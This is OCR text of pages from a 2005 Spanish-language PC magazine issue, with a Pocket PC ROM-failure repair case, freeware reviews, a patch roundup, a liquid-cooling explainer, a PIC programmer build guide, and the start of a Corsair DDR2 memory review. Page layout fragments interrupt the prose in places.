revista user 26

Page 1

36-37- Autopsias-P26.qxd

11/2/05

3:50 PM

Page 36

FALLAS ANALIZADAS CON OJO CLINICO

+ EL PISAPAPELES MAS

CARO DEL MUNDO sta es la segunda autopsia que realizamos sobre una Pocket PC, y no porque seamos fanáticos de este dispositivo (bueno… un poco sí). El punto es que los equipos de mano van ganando cada vez más adeptos entre los usuarios. Y no nos referimos sólo a las PDA: en el rubro entran también celulares, reproductores de MP3, cámaras digitales, consolas portátiles y varios etcéteras más. Resulta obvio, entonces, que mientras mayor sea la cantidad de dispositivos, mayor será el número de compradores que deambulen buscando soluciones a problemas inesperados. El caso que tratamos en esta oportunidad es el de un usuario que, intentando realizar una operación supuestamente “de rutina”, provocó una falla que casi dejó su Pocket convertida en un bonito ladrillo metálico.

E

Al igual que en el caso anterior, el equipo analizado es una Pocket PC iPAQ H3630, con 32 MB de ROM, procesador StrongARM SA1110 a 206 MHz y Windows CE 2000. El sistema operativo es el “talón de Aquiles” para aquellos exigentes que ven que su equipo SOBRE LA ACTUALIZACION Las Pocket PCs tienen una característica muy tentadora para los usuarios: la flexibilidad con respecto al sistema operativo. Si bien incluyen un software de origen, la sola posibilidad de actualizarlo y lograr, así, un funcionamiento y un aspecto visual totalmente diferentes, anima a quienes poseen uno de estos equipos a lanzarse a esta aventura. Incluso, en la actualidad existen versiones de Linux para Pocket PC. Un ejemplo de esto es el Intimate Project, que desarrolló una versión de Debian Linux para Pocket, y que puede descargarse desde

http://intimate.handhelds.org/index.html. Si bien las posibilidades que esto brinda son muy variadas, hay que ser muy prudentes al momento de fomentar esta actividad, ya que las empresas desarrolladoras de estos dispositivos no se hacen cargo de las fallas que puedan producirse durante el proceso. Si bien en el caso de esta autopsia resultó exitoso, esto no significa que todos los errores ocurridos durante

36

« LA POSIBILIDAD DE CORRER LINUX EN UNA POCKET PC PUEDE SER MUY TENTADORA, PERO HAY QUE SER CONSCIENTES DE LOS RIESGOS QUE SE PUEDEN CORRER DURANTE SU INSTALACION. la transferencia de una nueva ROM puedan salvarse recurriendo a un reemplazo de su contenido. También se han detectado casos en los que el MTTY no logró establecer el enlace con la Pocket PC corriendo Parrot, lo cual dejaría al usuario con mínimas posibilidades de restaurar su correcto funcionamiento.

«

HISTORIA CLINICA

podría correr perfectamente la versión 2002 (muy mejorada en su aspecto visual). Es por eso que muchos se lanzan a la aventura de actualizar la ROM de su H3630 utilizando los instaladores que, en su momento, Hewlett Packard distribuyó para los usuarios de este modelo, en una oferta limitada. De acuerdo con las instrucciones, antes de proceder a la actualización, se debe efectuar un “soft reset” de la iPAQ mediante el botón situado en la parte inferior. Luego, se la conecta al craddle, donde se sincronizan los datos y se le provee de energía desde la fuente de alimentación. Una vez que el equipo está “online” con respecto a la PC de escritorio, se corre el instalador que efectúa la actualización de la ROM. Este permite realizar un backup de su actual contenido, lo cual es altamente recomendable. Después de aceptar todos los parámetros previos, se inicia la transferencia del nuevo sistema operativo, proceso que puede seguirse desde una barra de progreso que aparece tanto en la pantalla de la iPAQ como en la PC de escritorio. Como pueden suponer, éste es el punto más crítico de la operación, debido a que los datos de la ROM original fue-

ANTE UNA FALLA EN LA TRANSFERENCIA DE LA ROM, LA IPAQ NO ES CAPAZ DE MOSTRAR OTRA COSA QUE NO SEA ESTO.

ron rescritos, y los de la actualización están en plena transferencia. Lo peor del caso es que un alto porcentaje de estas actualizaciones, por distintos motivos, fallan en este punto, y dejan la Pocket PC totalmente inutilizable. Uno de esos tantos casos fue el del protagonista de esta autopsia, quien llegó hasta nuestro laboratorio portando una PDA que, al encenderse, sólo mostraba una serie de caracteres irreconocibles y una pseudo-barra-de-progreso a medio completar. Según sus declaraciones, a mitad de la instalación apareció en la PC un mensaje que declaraba “error de transferencia”, tras lo cual no hubo mucho más para hacer.

ANALISIS PRELIMINAR En realidad, éste es un caso que no deja mucho margen de análisis, ya que el problema es obvio: los datos del sistema operativo alojados en la ROM están corruptos y, por lo tanto, no hay posibilidad de que la unidad funcione. A pesar de los intentos de “soft reset” y “hard reset” (realizados desde la llave de encendido de la iPAQ), nos POWERUSR


18-21-Herramientas-P26.qxd

11/2/05

4:30 PM

Page 18

HERRAMIENTAS »

¿DE QUE NOS SIRVE TENER EL ULTIMO HARDWARE EXISTENTE SI NO CONTAMOS CON UN BUEN SOFTWARE QUE NOS PERMITA EXPLOTARLO AL MAXIMO? EN ESTA SECCION, ELEGIMOS LAS MEJORES UTILIDADES Y LOS PROGRAMAS MAS INTERESANTES QUE SE PUEDEN CONSEGUIR EN LA RED.

STICK

KEEPASS

CATEGORIA: UTILITARIO

CATEGORIA: UTILITARIO (SEGURIDAD)

SITIO WEB: HTTP://IWONDERDESIGNS.COM/STICK

SITIO WEB: HTTP://KEEPASS.SOURCEFORGE.NET

PESO: 1,5 MB

PESO: 837 KB

LICENCIA: FREEWARE

LICENCIA: FREEWARE

Stick cambia la forma en la que manejamos las ventanas de Windows, y nos permite crear una serie de “tabs” desde los que podemos navegar por la Web o acceder al sistema de archivos tal como lo haríamos con el Explorador de Windows. La diferencia en estas ventanas es que se minimizan a pequeños tabs que podemos ubicar en cualquier esquina del Escritorio. También, otros tabs predefinidos nos permiten utilizar un lector RSS para nuestros feeds favoritos, tomar notas a las que les podemos aplicar el formato de texto que prefiramos y acceder a un pequeño calendario. Además de los predefinidos, podemos crear nuestros propios tabs para acceder a cualquier aplicación que deseemos. Desde el Tab Manager, también podemos modificar cada uno de los tabs para ajustar la apariencia a nuestro propio gusto. Como pequeña yapa, presionando la tecla de Windows más la barra espaciadora, accedemos a un launcher que nos permite ejecutar rápidamente cualquier programa.

KeePass es un administrador de contraseñas de código abierto con el que podemos manejar todo tipo de cuentas y contraseñas. Esto incluye las que usamos en Windows, cuentas de correo, homebanking (manejo de cuentas bancarias por la Web) y cualquier actividad que nos requiera recordar una clave. Incluso, podremos utilizar un generador automático de contraseñas para crear otras nuevas aleatorias, con la cantidad y tipo de caracteres que deseemos. Dentro de la aplicación, podemos organizar todas las claves en diferentes categorías, que se guardan en una base de datos. Luego, podremos exportarlas en archivos con formato TXT, HTML, XML o CSV, e importarlas en otras aplicaciones. Para proteger la información se utilizan dos algoritmos de encriptación: AES (estándar de encriptación avanzada) y TwoFish. De este modo, se protegen no sólo las claves sino, también, comentarios, nombres de usuario y toda la información que utilice la aplicación. Además de las opciones básicas, KeePass permite descargar una serie de plugins para agregarle funcionalidades adicionales.

µTORRENT

Constantemente se liberan nuevas versiones de µTorrent, por lo que es de esperar que se vayan agregando aún más opciones a esta muy buena herramienta. Ya se anunció que, en breve, estará disponible para descargar la versión en nuestro idioma.

CATEGORIA: CLIENTE BITTORRENT SITIO WEB: WWW.UTORRENT.COM PESO: 100 KB LICENCIA: FREEWARE

Este pequeño programa es, realmente, un caso particular dentro de la extensa lista de clientes que podemos elegir para conectarnos a la red BitTorrent: ofrece la mayoría de las opciones que podemos buscar en un cliente de este tipo, pero lo hace (sorprendentemente) consumiendo muy pocos recursos de nuestro sistema. La aplicación consta sólo de un archivo ejecutable que no necesita ser instalado, y pesa menos de 100 KB. Además de ejecutarse con gran velocidad, consume apenas 5 MB de memoria, un verdadero sueño hecho realidad para todos los usuarios acostumbrados a la voracidad de Azureus. La interfaz es muy parecida a la de este último, con el detalle de las descargas en la parte superior y varias solapas con estadísticas e información adicional en la inferior. 18

POWERUSR


18-20-Herramientas-P26.qxd

11/8/05

10:50

Page 19

S TUNEUP UTILITIES CATEGORIA: OPTIMIZADOR SITIO WEB: WWW.TUNE-UP.COM PESO: 8,68 MB LICENCIA: TRIAL (30 DIAS)

TuneUp Utilities es un programa muy popular dividido en varias subaplicaciones, con las cuales podemos optimizar todos los aspectos de nuestro sistema operativo a través de asistentes que simplifican el proceso. Uno de ellos es el “mantenimiento de un clic”, con el que, en pocos segundos, podemos analizar el sistema y obtener una lista de mejoras por realizar. Para que no nos encontremos con ninguna sorpresa desagradable, cuenta con una opción que guarda un historial de los cambios realizados y nos permite deshacer cualquiera de ellos. Las herramientas que ofrece TuneUp Utilities están divididas en cinco categorías que pasamos a detallar: ■ Cunstomize & Analize: Desde aquí podemos acceder a opciones para cambiar la apariencia de la interfaz de Windows, obtener información detallada del sistema y administrar los programas que se ejecutan al iniciar. ■ Clean up & Repair: Para eliminar archivos innecesarios y quitar referencias inválidas del Registro de Windows. ■ Optimize & Improve: Cuenta con una herramienta para optimi-

POWERUSR

zar la memoria, un desfragmentador del Registro y opciones para mejorar la performance general del sistema. ■ Administer & Control: Un administrador de los procesos de Windows, un editor del Registro y un desinstalador completan esta categoría. ■ File recovery & Destruction: Incluye una herramienta para borrar archivos definitivamente y otra para recuperar los que fueron eliminados.

19


18-21-Herramientas-P26.qxd

11/2/05

4:31 PM

Page 20

ACTUALIZACIONES

& PARCHES MICROSOFT

XPIZE

Tres actualizaciones críticas en el último boletín de seguridad con los identificacodres MS05-051, MS05-52 y MS05-053. El objetivo de los parches es una vulnerabilidad que podía permitir la ejecución de código remotamente en Windows 2000 y XP, varios problemas de seguridad en IE y una falla en DirectShow. Además, otras seis actualizaciones no críticas completan la lista de este mes. Como siempre para que no se nos desangre Windows, debemos descargarlas desde

CATEGORIA: UTILITARIO

http://windowsupdate.microsoft.com. QUICKTIME 7.0.3 Varias parches relacionados con la implementación del CODEC H.264 y el streaming de video. Se trata de una descarga de 33,6 MB desde www.apple.com/quicktime/download/win.html. WINAMP 5.11 Muchos bugs de versiones anteriores se han solucionado en esta versión, junto con algunas nuevas opciones. El peso de la descarga varía según qué versión elijamos bajar desde

www.winamp.com/player/free.php.

SITIO WEB: HTTP://XPERO.MSFN.ORG PESO: 9,5 MB LICENCIA: FREEWARE

Mientras esperamos a que, finalmente, salga Windows Vista, hay un par de cosas que podemos hacer para que nuestro XP envejezca de manera digna. Una de ellas es instalar XPize, una excelente herramienta gratuita que nos permite mejorar la GUI de Windows XP, y con la que podemos hacer que nuestro sistema operativo sea un poco más agradable a los ojos. XPize se encarga, básicamente, de actualizar viejos iconos y una enorme cantidad de recursos que Microsoft omitió actualizar en la versión XP. A la vez, renueva todos aquellos iconos de 16 bits obsoletos y los reemplaza por versiones mucho más actualizadas, agrega nuevas animaciones, y moderniza las pantallas de inicio y logueo. Además, para acompañar el cambio estético, cuenta con un wallpaper y un screensaver. La aplicación nos permite elegir entre dos modos de instalación: Normal Installation, con la que podemos elegir cada uno de los componentes por instalar, incluyendo los “extras” (varios adicionales incluidos); y Patch i386 files, que, simplemente, sobrescribirá el directorio i386 con los componentes de XPize, sin incluir los extras.

AVG ANTI-VIRUS 7.1 Soporte para Windows XP 64 bits, nuevas funcionalidades para escaneo de mails y opciones adicionales para configurar el agente residente son algunas de las opciones de este antivirus en su nueva versión gratuita. Hay que ingresar en http://free.grisoft.com/ doc/2/lng/us/tpl/v5 para descargar el instalador, que pesa 15,2 MB. REALTEK AC’97 VERSION A3.78 Este paquete incluye varios drivers y utilidades actualizados, además de un mejor soporte para la versión de 64 bits de Windows. Pesa 17,4 MB y podemos descargarlo vía FTP desde

ftp://202.65.194.18/pc/ac97/alc650/WDM_A378.exe. ADOBE READER 7.0.5 Incluye las actualizaciones de las versiones 7.0.1, 7.0.2 y 7.0.3, junto con algunas mejoras adicionales. Pesa 20 MB y se puede descargar desde www.adobe.com/products/acrobat/readstep2.html.

CRYPTAINER LE CATEGORIA: UTILITARIO (SEGURIDAD) SITIO WEB: WWW.CYPHERIX.COM/CRYPTAINERLE PESO: 2,65 MB LICENCIA: FREEWARE

Con Cryptainer LE podemos asegurar toda aquella información sensible que guardamos en la PC. Para hacerlo, la aplicación nos ofrece una encriptación de 128 bits para cualquier tipo de archivos que deseemos proteger: texto, imágenes, audio, video, bases de datos y cualquier otro que se nos ocurra. El proceso es muy simple: al instalarlo, se crea un “drive” virtual (o contenedor) que se agrega al entorno de Windows. Cuando queremos encriptar un archivo, sólo tenemos que copiarlo o moverlo a este drive, con lo que automáticamente se encriptará en pocos segundos. Para acceder a los archivos encriptados, tendremos que ingresar una contraseña que debemos haber configurado antes. 20

Además, Cryptainer LE nos permite instalar un programa en el contenedor, con el fin de asegurarnos de que seremos los únicos en usarlo o, inclusive, crear los contenedores en dispositivos portátiles para transportar la información a la vez que la mantenemos segura. Aunque la versión libre del programa nos permite encriptar un máximo de 25 MB de información en un contenedor, de todas maneras podemos crear una cantidad ilimitada de ellos, por lo que tendremos suficiente espacio para nuestros datos.

POWERUSR


42-44-Hard Cooling-P26.qxd

11/7/05

15:01

Page 42

NESTOR LOPEZ

.hrd

INGENIERO MECANICO, ESPECIALISTA EN REFRIGERACION

www.oc-squadron.com

«

BASES DE LA REFRIGERACION APLICADA

EL MUNDO DE LA REFRIGERACION DENTRO DE UNA PC NO SE LIMITA AL USO DE AIRE UNICAMENTE; EXISTEN APLICACIONES Y NECESIDADES EN LAS QUE ESTE NO SUELE SER SUFICIENTE. EN ESTOS CASOS, SE DEBE RECURRIR A SOLUCIONES MAS PODEROSAS Y, DENTRO DE ELLAS, LA REFRIGERACION LIQUIDA ES UNA DE LAS MAS UTILIZADAS.

SISTEMAS DE REFRIGERACION C

uando hablamos de refrigeración por aire en la edición anterior, dijimos que ésta se basa en el poder de conducción del disipador, y en el de convección que resulta de éste y el ventilador. Si lográramos mejorar estos dos factores, tendríamos un sistema, obviamente, de mayor rendimiento, lo que nos daría mejores temperaturas o un menor nivel sonoro, o lo que sería mejor aún, ambas cosas al mismo tiempo. Veamos cómo es posible lograrlo.

LA TEORIA Recordemos que el calor se “desplaza” por el disipador desde su punto de contacto con el procesador hacia toda la superficie, la cual debe ser bastante grande como para maximizar la convección. Por lo tanto, tenemos dos limitaciones prácticas. La primera es el coeficiente de conducción del disipador, el cual es constante para cada material y no hay nada que podamos hacer para mejorarlo. La segunda es un punto de equilibrio entre la superficie del disipador y lo cerrada que puede resultar la trama a medida que le agregamos más superficie de intercambio. Cuanto más difícil sea el pasaje del aire, más poderosos y ruidosos serán los ventiladores que tendremos que usar. Ahora bien, habremos conseguido un gran

« 42

UNA DE LAS VENTAJAS DE ESTOS SISTEMAS ES LA RELATIVA FACILIDAD PARA CONSTRUIR LOS BLOQUES NOSOTROS MISMOS, CON LO CUAL ES POSIBLE DARLES LAS MAS VARIADAS FORMAS.

«

LIQUIDA

ADEMAS DE TODAS SUS VENTAJAS EN CUANTO A REFRIGERACION, ESTOS SISTEMAS LES DAN UN ASPECTO “ESPECIAL” A LOS EQUIPOS. SIN DUDAS, ES OTRO PUNTO A FAVOR.

avance si, en vez de depender del coeficiente de conducción del disipador, utilizáramos algún medio para absorber el calor y, con este mismo, lo retiráramos rápidamente del lugar problemático para llevarlo a otro sector donde no tuviéramos tantos problemas de espacio y, además, pudiéramos repartirlo de manera más uniforme en una gran superficie de intercambio que pudiera ser atravesada más fácilmente por el aire.

LA PRACTICA Cuando usamos un sistema de refrigeración líquida, lo que hacemos es absorber, generalmente con agua destilada, el calor que desprende el procesador, gracias a la acción de un bloque de cobre. Este es un disipador como cualquier otro que ya conocemos, sólo que está adaptado al fluido con el que trabaja. El agua no se comporta de la misma manera que el aire, y su capacidad de absorber calor es muy superior, por lo que un bloque de refrigeración líquida necesitará una superficie mucho menor que la de un disipador por aire para cumplir adecuadamente su trabajo. Como es obvio, para que esto funcione de manera correcta, necesitamos un suministro constante de agua “fresca” en el bloque, por lo que si utilizamos siempre la misma agua dentro del circuito, será obligatorio contar con un elemento refrigerante. Los radiadores hacen exactamente eso: enfrían un fluido retirándole el calor que posee o entregándolo al aire. La ventaja de un radiador con respecto a un disipador común es muy grande; el calor que tiene el agua es más fácil de repartir sobre toda la superficie del mismo, ya que no contamos sólo con el poder de conducción del radiador, sino que el movimiento del agua colabora con esta acción. De este modo, la superficie podrá ser mucho mayor, y la distancia entre “aletas”, suficiente para que el aire pase entre ellas con relativa facilidad. Por lo tanto, ya no precisaremos ventiladores tan ruidosos para mantener la temperatura del agua dentro de parámetros aceptables. El sistema de refrigeración líquida no estaría completo sin una bomba que hiciera circular el líquido. Si el agua que le enviamos al bloque no es rápidamente retirada de allí, ésta aumentará su temperatura junto con el bloque, hasta un punto en el que no podrán enfriar más el procesador. Como podemos imaginar, el resultado de esta situación es evidente. POWERUSR


42-44-Hard Cooling-P26.qxd

11/7/05

15:01

Page 43

Existe una estrecha relación entre todos los componentes del sistema. Así como hay distintos tipos de disipadores, también hay diferentes clases de bloques, radiadores y bombas. Una correcta selección de estos elementos puede ser la diferencia entre el éxito y el fracaso.

EL BLOQUE Entre el procesador (que genera calor) y el líquido debe existir un intermediario: el bloque. Los bloques pueden ser de diversos tipos, basados en distintos conceptos de funcionamiento. Ya sabemos que en el intercambio por convección entre el bloque y el líquido intervienen la diferencia de temperatura entre FLUJOS LAMINARES Y TURBULENTOS Los fluidos se comportan de diferentes maneras según la forma en que se desplazan. Existen dos tipos de flujos o regímenes perfectamente definidos y diferenciados: el laminar y el turbulento. El primero se caracteriza por un movimiento ordenado de las moléculas, como si se tratara de una autopista en la que hubiera distintos “carriles” por los que se desplazara el fluido a diferentes velocidades, sin pasarse de uno al contiguo. De esta manera, por ejemplo, en el interior de un tubo con régimen laminar, el fluido que se encuentre más cerca de las paredes tendrá una velocidad menor que el que pase por el centro. Puntualmente, aquel que esté en contacto directo con la superficie, en determinadas condiciones, puede tener, incluso, velocidad nula. Esto se debe al rozamiento que existe en el seno mismo del flui-

POWERUSR

do entre las moléculas que lo componen y el que hay también con la superficie en contacto. El régimen turbulento es todo lo contrario al anterior: se caracteriza por un movimiento desordenado, prácticamente imposible de prever, en el que las moléculas pasan de un lado a otro en forma permanente. En el ejemplo anterior del tubo, tendremos un promedio de velocidades más constante dentro de él. Debido a que la diferencia entre laminar y turbulento depende, fundamentalmente, de la velocidad del fluido, a pesar de tener un flujo turbulento, aquellas moléculas que estén más cerca de la superficie de contacto, debido al rozamiento mencionado, tendrán una velocidad mucho menor, por lo que en esa zona habrá un flujo laminar. El límite que separa la zona de flujo laminar de la de flujo turbulento se conoce como “capa límite”.

ambos, la superficie de intercambio, el tipo de fluido y el régimen en el que se encuentra el flujo de líquido. Debido a que la conducción en los fluidos suele ser muy baja, un comportamiento laminar (ver recuadro) será capaz de retirar menos calor del bloque, ya que las moléculas que entran en contacto con la superficie toman calor de ésta, pero, al permanecer en “su carril”, esta capa de fluido va aumentando progresivamente su temperatura, mientras que las capas más alejadas de la superficie permanecen casi sin cambios. En tanto, si fuera turbulento, el agitamiento propio haría que moléculas de líquido más frescas se pusieran en contacto con la superficie. De esta manera, el “delta T” (∆T) será mayor y, por lo tanto, la transmisión de calor resultará más efectiva. Una de las mayores diferencias que encontramos entre los distintos tipos de bloques es el aprovechamiento de estos dos flujos. Intuitivamente, podemos decir que un bloque poco restrictivo tendrá en su interior velocidades relativamente bajas de líquido, por lo que tendremos, en general, un régimen laminar. Estos bloques se apoyan en un gran caudal de líquido para poder evacuar el calor en forma adecuada. Del otro lado, un bloque muy restrictivo tendrá bajos caudales y velocidades mucho mayores de las que nos dará un régimen turbulento. Entre estos dos extremos –e, incluso, en ellos mismos–, nos encontramos con una amplia variedad de soluciones, que van desde una simple recámara abierta por la que pasa el líquido (que presenta una restricción prácticamente despreciable), hasta sistemas con inyectores que le dan una enorme velocidad al fluido que se “dispara” sobre la superficie del bloque. Esto no sólo genera una gran turbulencia, sino que, además, reduce la zona laminar acercando la capa límite a la superficie del bloque, lo que da como resultado una mayor transferencia. Por supuesto que la bomba de agua no podrá ser la misma; en cada caso tendremos necesidades distintas, pero ya hablaremos sobre este tema en la próxima página.

«

«

QUIENES FABRICAN SUS PROPIOS SISTEMAS ESTAN ACOSTUMBRADOS A UTILIZAR BOMBAS PARA ACUARIOS. AFORTUNADAMENTE, EN LOS ULTIMOS TIEMPOS YA SE PODIAN CONSEGUIR BOMBAS DISEÑADAS Y FABRICADAS “PARA PC”, COMO ESTA, QUE CUENTA CON CONEXION USB Y ES CAPAZ DE REALIZAR MUCHAS MAS FUNCIONES QUE SOLO BOMBEAR LIQUIDO.

EXISTE UNA GRAN VARIEDAD DE “KITS” EN EL MERCADO. SIN EMBARGO, LOS MAS EXIGENTES SIEMPRE SE VUELCAN A SISTEMAS CASEROS O ARMADOS POR PARTES, CON COMPONENTES DE DISTINTOS ORIGENES.

43


46-48-Hard Microcontrol-P26.qxd

11/7/05

15:36

Page 46

ARIEL PALAZZESI

.hrd

ENTUSIASTA DE LA ELECTRONICA DIGITAL

arielpalazzesi@yahoo.com.ar

«

SEGUNDA PARTE

MICROCONTROLADORES L

os microcontroladores de Microchip (PICs) se programan mediante un protocolo tipo serie. Se necesitan dos tensiones de alimentación para llevar a cabo la programación: una de 4,5 V a 5,5 V (VDD), y otra comprendida entre 12 V y 14 V (VPP). Los pines implicados en la programación varían de un microcontrolador a otro, pero, en general, los de un mismo número de pines (8, 18, etc.) tienen las mismas patitas asignadas a la programación, lo que nos permite construir programadores que sirvan para más de un PIC. En el caso del 16F84A (y de casi todos los PIC de 18 pines), se utilizan los pines indicados en la tabla correspondiente durante la programación. Es muy recomendable leer la hoja de datos de Microchip sobre este tema (son unas 16 páginas, que se encuentran en www.iearobotics.com/ proyectos/cuadernos/ct4/download/16f8x-serial-prog.pdf), dado que permite conocer el mecanismo implicado en la programación (tiempos, señales, etc.). El documento se refiere, específicamente, a la familia 16F8x, pero los demás no difieren demasiado de lo allí expuesto. Con estos conceptos en mente, podemos pasar a la construcción de nuestro circuito programador, encargado de transferir el programa que escribamos en la PC a la memoria Flash del PIC. Esta es una memoria no volátil, de bajo consumo, que se puede escribir y borrar en el circuito integrado (al igual que las EEPROM). Microchip comercializa dos microcontroladores prácticamente iguales, que sólo se diferencian en que la memoria de programa de uno de ellos es tipo EEPROM, y la del otro, tipo Flash. Se trata del PIC16C84 y el PIC16F84, respectivamente. Además de esta memoria, casi todos los PICs también disponen de una memoria de datos de lectura y escritura no volátil (del tipo EEPROM). De esta manera, un corte en el suministro de la alimentación no ocasiona la pérdida de la información, que está disponible al reiniciarse el pro-

grama. Por ejemplo, el 16F84 dispone de 64 bytes de memoria EEPROM para contener datos, y los programas que generemos pueden leer y escribir en ella.

CONSTRUCCION DE UN PROGRAMADOR La construcción de un programador de PICs puede ser un proyecto muy simple o muy complicado, según las características que necesitemos incluir en él. En nuestro caso, dado que estamos desarrollando un circuito que sea lo más didáctico posible, intentaremos mantener las cosas lo más sencillas posible. Si nos damos una vueltita por Internet, veremos una infinidad de circuitos programadores, algunos con alimentación externa y otros no, por puerto serial, paralelo o USB, para un solo modelo de PIC o para varios, etc. El programador que construiremos en este caso se conoce como JDM, por las iniciales de su creador (Jens Dyekjær Madsen). Existen muchas variantes de él, pero, básicamente, todas tienen características similares. Es un circuito muy simple, pero que tiene varias ventajas que lo vuelven muy interesante: ■ Se conecta al puerto serie estándar (RS-232C) que en cualquier PC suele estar disponible. ■ Hay software gratuito para usarlo; incluso, bajo DOS, Linux y, por supuesto, Windows (incluido XP). ■ Sirve para programar varios modelos de PICs (12C5xx, 12C67x,

PINES DE PROGRAMACION PARA EL PIC16F84A NUMERO DE PIN 12 13 4 14 5 46

NOMBRE DEL PIN DURANTE LA PROGRAMACION RB6 RB7 MCLR VDD VSS

FUNCION

TIPO

DESCRIPCION

CLOCK DATA VTEST MODE VDD VSS

E E/S P P P

PULSOS DE RELOJ E/S DE DATOS SELECCION DE MODO POSITIVO (VCC) MASA (GND)

24Cxx, 16C55x, 16C61, 16C62x, 16C71, 16C71x, 16C8x, 16F8x, entre otros) y también para leer/escribir distintos chips de memoria (24Cxx). Otros microcontroladores también pueden ser programados mediante un adaptador. ■ Dispone del conector ICSP (InCircuit Serial Programming) para la programación de microcontroladores, sin necesidad de desmontarlos de su placa de circuito impreso. ■ No necesitamos una fuente de alimentación externa, ya que se alimenta directamente del puerto serie de la PC. ■ Su costo es muy bajo: los componentes necesarios difícilmente cuesten más de U$S 3 o 4, y son fáciles de conseguir. Una aclaración importante antes de seguir adelante: el hecho de que el programador se conecte a un puerto serie RS-232 de la PC no significa que el protocolo utilizado para comunicar la computadora y la placa del programador sea éste. De hecho, se puede adaptar este circuito para conectarlo al puerto paralelo. Como dijimos antes, los tiempos y las señales necesarios para programar los PICs dependen de un protocolo específico desarrollado por Microchip, por lo que utilizamos el puerto como vehículo para llevar los bits al PIC, y obtener las tensiones necesarias para la programación, pero utilizando un programa y un protocolo determinados para realizar esta tarea. Una vez que tengamos el circuito impreso listo, agujereado y bien limpio (libre de grasitud), procedemos a soldar los componentes. Son unos pocos y no debería de haber problemas. Es preferible soldar primero los puentes, el zócalo para el PIC y, POWERUSR


46-48-Hard Microcontrol-P26.qxd

*

15:36

Page 47

EN LA EDICION ANTERIOR HICIMOS UNA INTRODUCCION AL MUNDO DE LOS MICROCONTROLADORES. HOY CONSTRUIREMOS UN GRABADOR DE PICS Y VEREMOS COMO PROGRAMARLOS. TAMBIEN, HAREMOS NUESTRO PRIMER PROYECTO PARA FAMILIARIZARNOS CON ELLOS.

LISTA DE COMPONENTES La lista de componentes necesarios para el montaje del programador es breve, y está compuesta por lo siguiente: 4 diodos 1N4148 1 diodo Zener de 8,2 V 1 diodo Zener de 5,1 V 1 capacitor electrolítico de 100 µF, 40 V ■ 1 capacitor electrolítico de 22 µF, 16 V ■ 2 transistores BC547B ■ 1 resistor de 10 kΩ, 1/4 de watt

1

1

12C50X 16F84A

1

24CXX

«

luego, los demás elementos, teniendo cuidado de respetar el sentido en el que colocamos los diodos, los transistores y los capacitares; de lo contrario, el programador no funcionará. Deberemos decidir si usamos una ficha DB9 o una DB25, y soldar un cable plano de al menos 5 hilos, de aproximadamente un metro de largo, entre la plaqueta y la ficha, teniendo cuidado de no equivocarnos con la numeración de los pines (recomendamos ver el recuadro para conocer la disposición de pines de ambos conectores).

■ ■ ■ ■

11/7/05

■ ■

EN ESTE ESQUEMA SE PUEDE APRECIAR LA POSICION DE DISTINTOS MICROCONTROLADORES EN EL ZOCALO DEL PROGRAMADOR DE LAS DIFERENTES FAMILIAS SOPORTADAS.

1 resistor de 1,5 kΩ, 1/4 de watt 1 zócalo de 18 pines

Además, necesitamos un trozo de cable plano de al menos 5 hilos, un conector DB9 o DB25 (según el que tengamos en la PC) y, opcionalmente, un conector tipo molex de 8 pines para la programación “in circuit”. El impreso se construye como ya hemos visto en otras notas, o bien podemos usar un trozo de circuito impreso del que se emplea para construir prototipos, que ya tiene dibujadas las islas y los agujeros, y sólo tenemos que soldar puentes para “crear” nuestro diseño.

EL SOFT DEL GRABADOR Ya tenemos el hardware necesario; ahora, vamos a describir brevemente el software que usaremos. Se trata de IC-Prog, un programa gratuito que funciona bajo el sistema operativo Windows (cualquier versión) y que permite utilizar varios programadores (entre ellos, el que acabamos de construir). Es capaz de grabar y de leer prácticamente todos los PICs y casi todos los tipos de memorias que hay en el mercado. Podemos descargarlo gratuitamente de www.ic-prog.com, de donde elegimos la versión IC-Prog Software 1.05D Multi-Lingual (www.ic-prog.com/ icprog105D.zip, 550 KB). Si usamos Windows NT o XP, también necesitaremos descargar un driver especial, de www.ic-prog.com/icprog_driver.zip (menos de 2 KB), que deberemos descomprimir en la misma carpeta donde hayamos puesto el IC-Prog. Por cierto, todos los archivos comentados en esta nota están en PowerZone (http://power.tectimes.com) y en el CD exclusivo para suscriptores. En la misma página hay un excelente archivo de ayuda, en español, que deberíamos leer para usar el programa sin problemas. Es importante seleccionar el programador JDM en la opción Ajustes/Tipo Hardware, ya que de lo contrario, será imposible grabar nada. En dicha pantalla de opciones figura un control deslizable llamado Retardo I/O, que indica la demora entre cada dato enviado al PIC. Cuanto más pequeño sea, menos tardaremos en grabar el programa; pero según la PC que tengamos, no podremos hacerlo demasiado pequeño. Un buen valor es 10, y se pueden ir haciendo pruebas con otros menores; cuando veamos que la grabación falla, volvemos al valor que funcionó y lo dejamos así.

LENGUAJES DE PROGRAMACION

«

ESTA ES LA PANTALLA PRINCIPAL DEL PROGRAMA IC-PROG. AFORTUNADAMENTE, EXISTE UNA VERSION EN ESPAÑOL.

POWERUSR

Internamente, el 16F84A “entiende” una versión de lenguaje Assembler (ASM) compuesta por sólo 35 instrucciones (recordemos que su núcleo es un microprocesador RISC). Desde el punto de vista del PIC, el programa es una serie más o menos larga de “0” y “1”. Como sería sumamente complicado programar de esa manera, se utiliza un ASM provisto por Microchip (u otros 47


12-Labo Corsair-P26.qxd

.lab

11/2/05

3:20 PM

Page 12

CORSAIR

XMS2-5400UL E

UL DE “ULTRA LOW” Como ya dije, un aspecto que se les criticaba a las memorias DDR2 era las latencias de trabajo. Típicamente, las DDR2 trabajan con timings de 4-4-4-12 o 5-55-15, lo cual es mucho considerando el estándar de 2.5-3-3-7 o 3-3-3-8 de las DDR tradicionales. Estos nuevos módulos de Corsair rompen definitivamente todos esos mitos, ya que están certificados para operar a 675 MHz con latencias 3-2-2-8. Sin embargo, hay algunas restricciones: la tensión de trabajo para certificar esas latencias es de 2,1 V (contra el estándar de 1,8 V), y sólo se garantizan en motherboards con chipset nForce4 SLI Intel Edition. Precisamente, la gente de Corsair ha trabajado en conjunto con NVIDIA para realizar el controlador de memoria de su chipset para Pentium 4, por lo cual 12

LA GENTE DE CORSAIR MEMORY NOS ENVIO SU KIT DE MEMORIAS DDR2 DE MEJORES PRESTACIONES, CAPAZ DE SATISFACER TOTALMENTE LAS EXPECTATIVAS DE LOS MAXIMOS FANATICOS DEL OVERCLOCKING.

»

